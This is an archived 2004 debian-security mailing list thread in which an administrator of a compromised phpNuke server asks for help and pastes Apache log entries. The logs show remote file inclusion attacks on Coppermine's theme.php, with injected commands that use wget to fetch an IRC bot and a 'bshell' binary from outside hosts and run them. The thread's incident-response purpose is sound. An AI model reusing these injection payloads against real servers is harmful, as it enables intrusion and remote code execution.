RE: Advice needed, trying to find the vulnerable code on Debian webserver.

To: <debian-security@lists.debian.org>
Subject: RE: Advice needed, trying to find the vulnerable code on Debian webserver.
From: "Ross Tsolakidis" <Ross.Tsolakidis@day3.com.au>
Date: Sat, 19 Jun 2004 10:42:56 +1000
Message-id: <[🔎] D03D875AFA05D34C98F1B0DBB71C3DBA6E1C12@hermes.powerserve.lan>

Hi all,

I did a search in the logs on some of the suspicious users and found a
match.
The files that are being downloaded then executed see to be IRC bots.
http://www.energymech.net/

Here are some log files.

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200
6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

193.95.112.71 - - [18/Jun/2004:22:57:05 +1000] "GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?&cmd=cd%20/tmp/;ps%20x HTTP/1.0" 200 8847 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows NT 5.0)"

200.177.162.14 - - [21/May/2004:19:10:06 +1000] "GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.brooks
equipment.com/newcmd.gif?&cmd=cd%20/tmp;%20wget%20200.177.162.14/bshell
HTTP/1.1" 200 11813 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98;
Win 9x 4.90)"

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200
6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200
6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

All those executables in the /tmp dir seem to be all coming from that
site on our box, definitely the culprit.

Can someone explain what is going on here ?
Cause it doesn't make any sense.

The site in question is a phpnuke site with lots of modules.

What steps should I take now ?

Thanks very much for everyones help.

--
Ross

-----Original Message-----
From: Ross Tsolakidis 
Sent: Friday, 18 June 2004 9:20 AM
To: debian-security@lists.debian.org
Subject: RE: Advice needed, trying to find the vulnerable code on Debian
webserver.

Thanks to everyone who has responded.
I will be investigating all these options in the next few days, I'll
keep you all informed. 

--
Ross

-----Original Message-----
From: Steve Kemp [mailto:steve@steve.org.uk] On Behalf Of Steve Kemp
Sent: Thursday, 17 June 2004 3:24 AM
To: list-help@riseup.net
Cc: Alvin Oga; debian-security@lists.debian.org
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
> > > 
> > > Install some rules for it to harden your webserver, see if 
> > > anything is flagged in the security log.
> > 
> > other web server testing tools
> > 	http://www.linux-sec.net/Web/#Testing
> 
> Has anyone actually used any of these to find the vulnerabilities that

> are being discussed?

  Not personally, I've used snort and some other custom logging code  to
find exploit attempts in real time though.

  Can you tell us what CGI apps are installed upon the box?  Or  do the
access logs should anything suspicious?  It's clear that  Apache is the
route into the system if you have files owned by  www-data - maybe
mounting /tmp noexec would help?

  (note: mounting /tmp noexec breaks apt often).

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit

--
To UNSUBSCRIBE, email to debian-security-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact
listmaster@lists.debian.org

DISCLAIMER: This e-mail and any files transmitted with it may be
privileged and confidential, and are intended only for the use of the
intended recipient. If you are not the intended recipient or responsible
for delivering this e-mail to the intended recipient, any use,
dissemination, forwarding, printing or copying of this e-mail and any
attachments is strictly prohibited. If you have received this e-mail in
error, please REPLY TO the SENDER to advise the error AND then DELETE
the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with it are
those of the individual sender, except where the sender specifically
states them to be the views of our organisation.
Our organisation does not represent or warrant that the attached files
are free from computer viruses or other defects. The user assumes all
responsibility for any loss or damage resulting directly or indirectly
from the use of the attached files. In any event, the liability to our
organisation is limited to either the resupply of the attached files or
the cost of having the attached files resupplied.

Reply to:

Follow-Ups:
- Re: Advice needed, trying to find the vulnerable code on Debian webserver.
  - From: Steve Kemp <skx@debian.org>

Prev by Date: RE: Advice needed, trying to find the vulnerable code on Debian webserver.
Next by Date: Re: Advice needed, trying to find the vulnerable code on Debian webserver.
Previous by thread: RE: Advice needed, trying to find the vulnerable code on Debian webserver.
Next by thread: Re: Advice needed, trying to find the vulnerable code on Debian webserver.
Index(es):
- Date
- Thread